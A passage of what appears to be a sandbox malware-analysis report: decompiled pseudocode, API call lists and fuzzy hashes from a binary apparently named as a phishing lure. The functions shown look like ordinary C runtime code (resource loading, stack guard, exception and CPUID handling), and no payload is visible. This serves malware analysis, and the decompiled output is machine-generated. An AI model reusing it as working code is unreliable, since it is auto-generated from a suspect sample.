    							_t111 =  *(_t112 - 0x424);
    						} else {
    							E00EB02F0(_t109);
    							 *((intOrPtr*)(_t112 - 0x10)) = _t115;
    							_t64 = _t115;
    						}
    						_t65 = E00EA1251(_t64,  *(_t112 - 0x41c), _t109, 3);
    						 *(_t112 - 0x41c) = _t65;
    						if(_t65 == 0) {
    							goto L29;
    						} else {
    							_t109 = LoadLibraryExA(_t65, _t89, 0x60);
    							 *(_t112 - 0x420) = _t109;
    							if(_t109 != 0) {
    								L10:
    								_t67 = FindResourceA(_t109,  *(_t112 - 0x42c),  *(_t112 - 0x428));
    								 *(_t112 - 0x42c) = _t67;
    								__eflags = _t67;
    								if(_t67 != 0) {
    									_t68 = LoadResource(_t109, _t67);
    									 *(_t112 - 0x428) = _t68;
    									__eflags = _t68;
    									if(_t68 == 0) {
    										goto L11;
    									} else {
    										_t75 = SizeofResource(_t109,  *(_t112 - 0x42c));
    										 *(_t112 - 0x41c) = _t75;
    										_t30 =  &(_t75[1]); // 0x1
    										_t98 = _t30;
    										__eflags = _t30 - _t75;
    										if(_t30 >= _t75) {
    											 *((char*)(_t112 - 4)) = 2;
    											__eflags = E00EA3D42(_t98) - 0x400;
    											if(__eflags <= 0) {
    												 *(_t112 - 0x418) = _t112 - 0x414;
    											} else {
    												E00EA3D1D(_t112 - 0x418, _t111, __eflags, _t76);
    											}
    											 *((intOrPtr*)(_t112 - 4)) = 1;
    											__eflags =  *(_t112 - 0x418);
    											if( *(_t112 - 0x418) == 0) {
    												goto L14;
    											} else {
    												E00EA1285(E00EA1105( *(_t112 - 0x418),  *(_t112 - 0x41c),  *(_t112 - 0x428),  *(_t112 - 0x41c)));
    												 *( *(_t112 - 0x418) +  *(_t112 - 0x41c)) = _t89;
    												_t69 = E00EA2C50(_t89, _t112 - 0x434,  *(_t112 - 0x41c), __eflags,  *(_t112 - 0x418),  *((intOrPtr*)(_t112 + 0x14)));
    												goto L21;
    											}
    										} else {
    											L14:
    											_t89 = 0x8007000e;
    										}
    									}
    								} else {
    									L11:
    									_t69 = E00EA12C0();
    									L21:
    									_t89 = _t69;
    								}
    								__eflags = _t109;
    								if(_t109 != 0) {
    									FreeLibrary(_t109);
    								}
    							} else {
    								_t83 = LoadLibraryExA( *(_t112 - 0x41c), _t89, 2);
    								_t109 = _t83;
    								 *(_t112 - 0x420) = _t83;
    								if(_t109 != 0) {
    									goto L10;
    								} else {
    									_t89 = E00EA12C0();
    								}
    							}
    							if( *(_t112 - 0x418) != _t112 - 0x414) {
    								E00EA3D14(_t112 - 0x418);
    							}
    							if(_t111 != 0) {
    								do {
    									_t109 = _t111->i;
    									_t111 = _t109;
    									E00EA7188(_t111);
    								} while (_t109 != 0);
    							}
    						}
    					}
    				}
    				return E00EB01D4(_t89, _t109, _t111);
    			}

    APIs
    • __EH_prolog3_catch_GS.LIBCMT ref: 00EA1B43
    • __alloca_probe_16.LIBCMT ref: 00EA1BCE
    • LoadLibraryExA.KERNEL32(00000000,00000000,00000060,?,?,?,?,?), ref: 00EA1C0E
    • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00EA1C29
      • Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1
    • FindResourceA.KERNEL32(00000000,?,?), ref: 00EA1C54
    • LoadResource.KERNEL32(00000000,00000000), ref: 00EA1C70
    • SizeofResource.KERNEL32(00000000,?), ref: 00EA1C87
    • FreeLibrary.KERNEL32(00000000), ref: 00EA1D48
    Similarity
    • API ID: LibraryLoadResource$__alloca_probe_16$FindFreeH_prolog3_catch_Sizeof
    • String ID:
    • API String ID: 2027223938-0
    • Opcode ID: 8073a3192f59dfd40ec7a056fab6466ad91e676cc424f78f4fc836502de2c9bd
    • Instruction ID: cb49504d29a7c8c28226c216853cdad480b5c9844fd22314f0461820e7e99eb2
    • Opcode Fuzzy Hash: 8073a3192f59dfd40ec7a056fab6466ad91e676cc424f78f4fc836502de2c9bd
    • Instruction Fuzzy Hash: 0C6161B1A002189BCB259F24CC807EDB7F5AF4E354F5450E9E609BB251DB30AE858F69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00EA71A3(void* __edx) {
    				signed int _v8;
    				char _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				long _v24;
    				struct _MEMORY_BASIC_INFORMATION _v52;
    				struct _SYSTEM_INFO _v88;
    				void* _v100;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t18;
    				void* _t20;
    				void* _t22;
    				long _t23;
    				char _t24;
    				long _t30;
    				signed int _t37;
    				void* _t41;
    				void* _t42;
    				signed int _t44;
    				long _t46;
    				char _t47;
    				signed int _t50;
    				void* _t51;
    
    				_t41 = __edx;
    				_t18 =  *0xeb9008; // 0x64e1d101
    				_v8 = _t18 ^ _t50;
    				_t20 = 4;
    				E00EB02C0(_t20);
    				_t22 = _t51;
    				_v16 = _t22;
    				_t23 = VirtualQuery(_t22,  &_v52, 0x1c);
    				_t53 = _t23;
    				if(_t23 == 0) {
    					L12:
    					_t24 = 0;
    					__eflags = 0;
    				} else {
    					_v20 = _v52.AllocationBase;
    					GetSystemInfo( &_v88);
    					_t37 = _v88.dwPageSize;
    					_t47 = 0;
    					_v12 = 0;
    					if(E00EA9A78(_t53,  &_v12) != 0 && _v12 > 0) {
    						_t47 = _v12;
    					}
    					_t44 =  ~_t37;
    					_t46 = _t47 - 0x00000001 + _t37 & _t44;
    					if(_t46 != 0) {
    						_t46 = _t46 + _t37;
    					}
    					_t30 = _t37 + _t37;
    					if(_t46 < _t30) {
    						_t46 = _t30;
    					}
    					_t42 = (_t44 & _v16) - _t46;
    					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
    						goto L12;
    					} else {
    						_t24 = 1;
    					}
    				}
    				return E00EA403C(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00EA71CC
    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00EA71E0
    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 00EA7230
    • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 00EA7245
    Similarity
    • API ID: Virtual$AllocInfoProtectQuerySystem
    • String ID:
    • API String ID: 3562403962-0
    • Opcode ID: 1c715cdc83b2f5e712886c89299617e31ffc559478dd4273e449b42caa2bb896
    • Instruction ID: 20cb27d5c608098a68021ba901e5053c426bd7d7562aae97e253e93e4f41569e
    • Opcode Fuzzy Hash: 1c715cdc83b2f5e712886c89299617e31ffc559478dd4273e449b42caa2bb896
    • Instruction Fuzzy Hash: F821C7B2E44118ABCB20DBE9DC85BEFB7B8EF49754F010165F955FB140E634A904C7A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00EA4959(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
    				char _v0;
    				struct _EXCEPTION_POINTERS _v12;
    				intOrPtr _v80;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				void* _v616;
    				intOrPtr _v620;
    				char _v624;
    				intOrPtr _v628;
    				intOrPtr _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				intOrPtr _v644;
    				intOrPtr _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				intOrPtr _v664;
    				intOrPtr _v668;
    				char _v808;
    				char* _t39;
    				long _t49;
    				intOrPtr _t51;
    				void* _t54;
    				intOrPtr _t55;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				intOrPtr* _t60;
    
    				_t59 = __esi;
    				_t58 = __edi;
    				_t57 = __edx;
    				if(IsProcessorFeaturePresent(0x17) != 0) {
    					_t55 = _a4;
    					asm("int 0x29");
    				}
    				E00EA4B51(_t34);
    				 *_t60 = 0x2cc;
    				_v632 = E00EA5210(_t58,  &_v808, 0, 3);
    				_v636 = _t55;
    				_v640 = _t57;
    				_v644 = _t51;
    				_v648 = _t59;
    				_v652 = _t58;
    				_v608 = ss;
    				_v620 = cs;
    				_v656 = ds;
    				_v660 = es;
    				_v664 = fs;
    				_v668 = gs;
    				asm("pushfd");
    				_pop( *_t15);
    				_v624 = _v0;
    				_t39 =  &_v0;
    				_v612 = _t39;
    				_v808 = 0x10001;
    				_v628 =  *((intOrPtr*)(_t39 - 4));
    				E00EA5210(_t58,  &_v92, 0, 0x50);
    				_v92 = 0x40000015;
    				_v88 = 1;
    				_v80 = _v0;
    				_t28 = IsDebuggerPresent() - 1; // -1
    				_v12.ExceptionRecord =  &_v92;
    				asm("sbb bl, bl");
    				_v12.ContextRecord =  &_v808;
    				_t54 =  ~_t28 + 1;
    				SetUnhandledExceptionFilter(0);
    				_t49 = UnhandledExceptionFilter( &_v12);
    				if(_t49 == 0 && _t54 == 0) {
    					_push(3);
    					return E00EA4B51(_t49);
    				}
    				return _t49;
    			}

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EA4965
    • IsDebuggerPresent.KERNEL32 ref: 00EA4A31
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EA4A51
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00EA4A5B
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 08ab8063b1b4e91da5a4f0c4461cfe459e6a2207fbea1eea11c3ed7fecb7392a
    • Instruction ID: 661f399b95d10e8a89591b3c8a4227ed0c8e243b30e63f11470d381ef5828001
    • Opcode Fuzzy Hash: 08ab8063b1b4e91da5a4f0c4461cfe459e6a2207fbea1eea11c3ed7fecb7392a
    • Instruction Fuzzy Hash: FF311AB5D412189BDF10DFA5D989BCDBBF8AF08304F1041DAE40DAB2A0EB709B849F55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E00EA72E0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v0;
    				signed int _v8;
    				intOrPtr _v524;
    				intOrPtr _v528;
    				void* _v532;
    				intOrPtr _v536;
    				char _v540;
    				intOrPtr _v544;
    				intOrPtr _v548;
    				intOrPtr _v552;
    				intOrPtr _v556;
    				intOrPtr _v560;
    				intOrPtr _v564;
    				intOrPtr _v568;
    				intOrPtr _v572;
    				intOrPtr _v576;
    				intOrPtr _v580;
    				intOrPtr _v584;
    				char _v724;
    				intOrPtr _v792;
    				intOrPtr _v800;
    				char _v804;
    				struct _EXCEPTION_POINTERS _v812;
    				void* __edi;
    				signed int _t40;
    				char* _t47;
    				char* _t49;
    				intOrPtr _t60;
    				intOrPtr _t61;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				int _t67;
    				intOrPtr _t68;
    				signed int _t69;
    
    				_t68 = __esi;
    				_t65 = __edx;
    				_t60 = __ebx;
    				_t40 =  *0xeb9008; // 0x64e1d101
    				_t41 = _t40 ^ _t69;
    				_v8 = _t40 ^ _t69;
    				if(_a4 != 0xffffffff) {
    					_push(_a4);
    					E00EA4B51(_t41);
    					_pop(_t61);
    				}
    				E00EA5210(_t66,  &_v804, 0, 0x50);
    				E00EA5210(_t66,  &_v724, 0, 0x2cc);
    				_v812.ExceptionRecord =  &_v804;
    				_t47 =  &_v724;
    				_v812.ContextRecord = _t47;
    				_v548 = _t47;
    				_v552 = _t61;
    				_v556 = _t65;
    				_v560 = _t60;
    				_v564 = _t68;
    				_v568 = _t66;
    				_v524 = ss;
    				_v536 = cs;
    				_v572 = ds;
    				_v576 = es;
    				_v580 = fs;
    				_v584 = gs;
    				asm("pushfd");
    				_pop( *_t22);
    				_v540 = _v0;
    				_t49 =  &_v0;
    				_v528 = _t49;
    				_v724 = 0x10001;
    				_v544 =  *((intOrPtr*)(_t49 - 4));
    				_v804 = _a8;
    				_v800 = _a12;
    				_v792 = _v0;
    				_t67 = IsDebuggerPresent();
    				SetUnhandledExceptionFilter(0);
    				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
    					_push(_a4);
    					_t57 = E00EA4B51(_t57);
    				}
    				return E00EA403C(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
    			}

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 00EA73D8
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EA73E2
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00EA73EF
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: 5644f17cc6aec30393880f60eb116b326139b3fa47f23b46ec93abf7073500d8
    • Instruction ID: d0e15de39aafd1ff838871ef310954670c25e09a6651a85b2207cb0fac1497f8
    • Opcode Fuzzy Hash: 5644f17cc6aec30393880f60eb116b326139b3fa47f23b46ec93abf7073500d8
    • Instruction Fuzzy Hash: BF31C2759012189BCB21DF24DC89BCDBBB4AF08310F5052EAA41CAB2A1E774AB858F55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EA7B8E(int _a4) {
    				void* _t14;
    
    				if(E00EA9DF6(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
    					TerminateProcess(GetCurrentProcess(), _a4);
    				}
    				E00EA7C13(_t14, _a4);
    				ExitProcess(_a4);
    			}





    APIs
    • GetCurrentProcess.KERNEL32(?,?,00EA7B8D,?,00000000,?,?,?,00EA9C0E), ref: 00EA7BB0
    • TerminateProcess.KERNEL32(00000000,?,00EA7B8D,?,00000000,?,?,?,00EA9C0E), ref: 00EA7BB7
    • ExitProcess.KERNEL32 ref: 00EA7BC9
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 99cc13800cf49205e186e5aed5188090de4324b124a5d0ccf7232fb74a18c867
    • Instruction ID: 7e5096fc5e27b35702d324fc85148afa47e50f01beb78931f0c8feb2ee322f4f
    • Opcode Fuzzy Hash: 99cc13800cf49205e186e5aed5188090de4324b124a5d0ccf7232fb74a18c867
    • Instruction Fuzzy Hash: ACE04631004148AFCF12AF16DD19E8A3FAAEB4A365B400464F844AE131CB39ED81CAA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EAFA9C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
    				signed int _t172;
    				signed int _t175;
    				signed int _t178;
    				signed int* _t179;
    				signed char _t193;
    				signed int _t196;
    				signed int _t200;
    				signed int _t203;
    				void* _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t211;
    				signed int _t226;
    				unsigned int* _t241;
    				signed char _t243;
    				signed int* _t251;
    				unsigned int* _t257;
    				signed int* _t258;
    				signed char _t260;
    				long _t263;
    				signed int* _t266;
    
    				 *(_a4 + 4) = 0;
    				_t263 = 0xc000000d;
    				 *(_a4 + 8) = 0;
    				 *(_a4 + 0xc) = 0;
    				_t243 = _a12;
    				if((_t243 & 0x00000010) != 0) {
    					_t263 = 0xc000008f;
    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
    				}
    				if((_t243 & 0x00000002) != 0) {
    					_t263 = 0xc0000093;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
    				}
    				if((_t243 & 0x00000001) != 0) {
    					_t263 = 0xc0000091;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
    				}
    				if((_t243 & 0x00000004) != 0) {
    					_t263 = 0xc000008e;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
    				}
    				if((_t243 & 0x00000008) != 0) {
    					_t263 = 0xc0000090;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
    				}
    				_t266 = _a8;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
    				_t260 = E00EAE06F(_a4);
    				if((_t260 & 0x00000001) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
    				}
    				if((_t260 & 0x00000004) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
    				}
    				if((_t260 & 0x00000008) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
    				}
    				if((_t260 & 0x00000010) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
    				}
    				if((_t260 & 0x00000020) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
    				}
    				_t172 =  *_t266 & 0x00000c00;
    				if(_t172 == 0) {
    					 *_a4 =  *_a4 & 0xfffffffc;
    				} else {
    					if(_t172 == 0x400) {
    						_t258 = _a4;
    						_t226 =  *_t258 & 0xfffffffd | 1;
    						L26:
    						 *_t258 = _t226;
    						L29:
    						_t175 =  *_t266 & 0x00000300;
    						if(_t175 == 0) {
    							_t251 = _a4;
    							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
    							L35:
    							 *_t251 = _t178;
    							L36:
    							_t179 = _a4;
    							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
    							if(_a28 == 0) {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
    								 *((long long*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t255 = _a4;
    								_t241 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
    								 *(_a4 + 0x50) =  *_t241;
    							} else {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t241 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
    								 *(_a4 + 0x50) =  *_t241;
    							}
    							E00EADFDB(_t255);
    							RaiseException(_t263, 0, 1,  &_a4);
    							_t257 = _a4;
    							_t193 = _t257[2];
    							if((_t193 & 0x00000010) != 0) {
    								 *_t266 =  *_t266 & 0xfffffffe;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000008) != 0) {
    								 *_t266 =  *_t266 & 0xfffffffb;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000004) != 0) {
    								 *_t266 =  *_t266 & 0xfffffff7;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000002) != 0) {
    								 *_t266 =  *_t266 & 0xffffffef;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000001) != 0) {
    								 *_t266 =  *_t266 & 0xffffffdf;
    							}
    							_t196 =  *_t257 & 0x00000003;
    							if(_t196 == 0) {
    								 *_t266 =  *_t266 & 0xfffff3ff;
    							} else {
    								_t207 = _t196 - 1;
    								if(_t207 == 0) {
    									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
    									L55:
    									 *_t266 = _t210;
    									L58:
    									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
    									if(_t200 == 0) {
    										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
    										L64:
    										 *_t266 = _t203;
    										L65:
    										if(_a28 == 0) {
    											 *_t241 = _t257[0x14];
    										} else {
    											 *_t241 = _t257[0x14];
    										}
    										return _t203;
    									}
    									_t204 = _t200 - 1;
    									if(_t204 == 0) {
    										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
    										goto L64;
    									}
    									_t203 = _t204 - 1;
    									if(_t203 == 0) {
    										 *_t266 =  *_t266 & 0xfffff3ff;
    									}
    									goto L65;
    								}
    								_t211 = _t207 - 1;
    								if(_t211 == 0) {
    									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
    									goto L55;
    								}
    								if(_t211 == 1) {
    									 *_t266 =  *_t266 | 0x00000c00;
    								}
    							}
    							goto L58;
    						}
    						if(_t175 == 0x200) {
    							_t251 = _a4;
    							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
    							goto L35;
    						}
    						if(_t175 == 0x300) {
    							 *_a4 =  *_a4 & 0xffffffe3;
    						}
    						goto L36;
    					}
    					if(_t172 == 0x800) {
    						_t258 = _a4;
    						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
    						goto L26;
    					}
    					if(_t172 == 0xc00) {
    						 *_a4 =  *_a4 | 0x00000003;
    					}
    				}
    			}

























    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EAFA97,?,?,00000008,?,?,00EAF72F,00000000), ref: 00EAFCC9
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: 0c55cd06a300551008d85c1c3171009018e90e8a1223206de62616f917749749
    • Instruction ID: 92a7b202bc1577aa1163311615e9bea32eaa4852e2c6f73fb4b3dbe9247d4a06
    • Opcode Fuzzy Hash: 0c55cd06a300551008d85c1c3171009018e90e8a1223206de62616f917749749
    • Instruction Fuzzy Hash: 01B15E31610609CFD715CF68C496BA57BF0FF4A368F259668E899DF2A1C335E982CB40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00EA4775(signed int __edx) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr _t60;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				signed int _t66;
    				signed int _t67;
    				signed int _t73;
    				intOrPtr _t74;
    				intOrPtr _t75;
    				intOrPtr* _t77;
    				signed int _t78;
    				intOrPtr* _t82;
    				signed int _t85;
    				signed int _t90;
    				intOrPtr* _t93;
    				signed int _t96;
    				signed int _t99;
    				signed int _t104;
    
    				_t90 = __edx;
    				 *0xfe2724 =  *0xfe2724 & 0x00000000;
    				 *0xeb9010 =  *0xeb9010 | 0x00000001;
    				if(IsProcessorFeaturePresent(0xa) == 0) {
    					L23:
    					return 0;
    				}
    				_v20 = _v20 & 0x00000000;
    				_push(_t74);
    				_t93 =  &_v40;
    				asm("cpuid");
    				_t75 = _t74;
    				 *_t93 = 0;
    				 *((intOrPtr*)(_t93 + 4)) = _t74;
    				 *((intOrPtr*)(_t93 + 8)) = 0;
    				 *(_t93 + 0xc) = _t90;
    				_v16 = _v40;
    				_v8 = _v28 ^ 0x49656e69;
    				_v12 = _v32 ^ 0x6c65746e;
    				_push(_t75);
    				asm("cpuid");
    				_t77 =  &_v40;
    				 *_t77 = 1;
    				 *((intOrPtr*)(_t77 + 4)) = _t75;
    				 *((intOrPtr*)(_t77 + 8)) = 0;
    				 *(_t77 + 0xc) = _t90;
    				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
    					L9:
    					_t96 =  *0xfe2728; // 0x2
    					L10:
    					_t85 = _v32;
    					_t60 = 7;
    					_v8 = _t85;
    					if(_v16 < _t60) {
    						_t78 = _v20;
    					} else {
    						_push(_t77);
    						asm("cpuid");
    						_t82 =  &_v40;
    						 *_t82 = _t60;
    						 *((intOrPtr*)(_t82 + 4)) = _t77;
    						 *((intOrPtr*)(_t82 + 8)) = 0;
    						_t85 = _v8;
    						 *(_t82 + 0xc) = _t90;
    						_t78 = _v36;
    						if((_t78 & 0x00000200) != 0) {
    							 *0xfe2728 = _t96 | 0x00000002;
    						}
    					}
    					_t61 =  *0xeb9010; // 0x6f
    					_t62 = _t61 | 0x00000002;
    					 *0xfe2724 = 1;
    					 *0xeb9010 = _t62;
    					if((_t85 & 0x00100000) != 0) {
    						_t63 = _t62 | 0x00000004;
    						 *0xfe2724 = 2;
    						 *0xeb9010 = _t63;
    						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
    							asm("xgetbv");
    							_v24 = _t63;
    							_v20 = _t90;
    							_t104 = 6;
    							if((_v24 & _t104) == _t104) {
    								_t66 =  *0xeb9010; // 0x6f
    								_t67 = _t66 | 0x00000008;
    								 *0xfe2724 = 3;
    								 *0xeb9010 = _t67;
    								if((_t78 & 0x00000020) != 0) {
    									 *0xfe2724 = 5;
    									 *0xeb9010 = _t67 | 0x00000020;
    									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
    										 *0xeb9010 =  *0xeb9010 | 0x00000040;
    										 *0xfe2724 = _t104;
    									}
    								}
    							}
    						}
    					}
    					goto L23;
    				}
    				_t73 = _v40 & 0x0fff3ff0;
    				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
    					_t99 =  *0xfe2728; // 0x2
    					_t96 = _t99 | 0x00000001;
    					 *0xfe2728 = _t96;
    					goto L10;
    				} else {
    					goto L9;
    				}
    			}































    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EA478B
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: e6c6510eeb701193f5802062348b27db6221c4e0d77d6116b6cd26cc3b907b0c
    • Instruction ID: f5f9ed81cada428d7f5f47b0958d33ba01d2ce4521b755fa2531079fe2698719
    • Opcode Fuzzy Hash: e6c6510eeb701193f5802062348b27db6221c4e0d77d6116b6cd26cc3b907b0c
    • Instruction Fuzzy Hash: 3551C0B2901259CFDB29CF59E8817AABBF4FB89354F208429E500FF290D3B4A940CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00EAA22B(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
    				signed int _v8;
    				signed int _v12;
    				union _FINDEX_INFO_LEVELS _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				signed int _v48;
    				struct _WIN32_FIND_DATAW _v604;
    				char _v605;
    				intOrPtr* _v612;
    				union _FINDEX_INFO_LEVELS _v616;
    				union _FINDEX_INFO_LEVELS _v620;
    				union _FINDEX_INFO_LEVELS _v624;
    				signed int _v628;
    				union _FINDEX_INFO_LEVELS _v632;
    				union _FINDEX_INFO_LEVELS _v636;
    				signed int _v640;
    				signed int _v644;
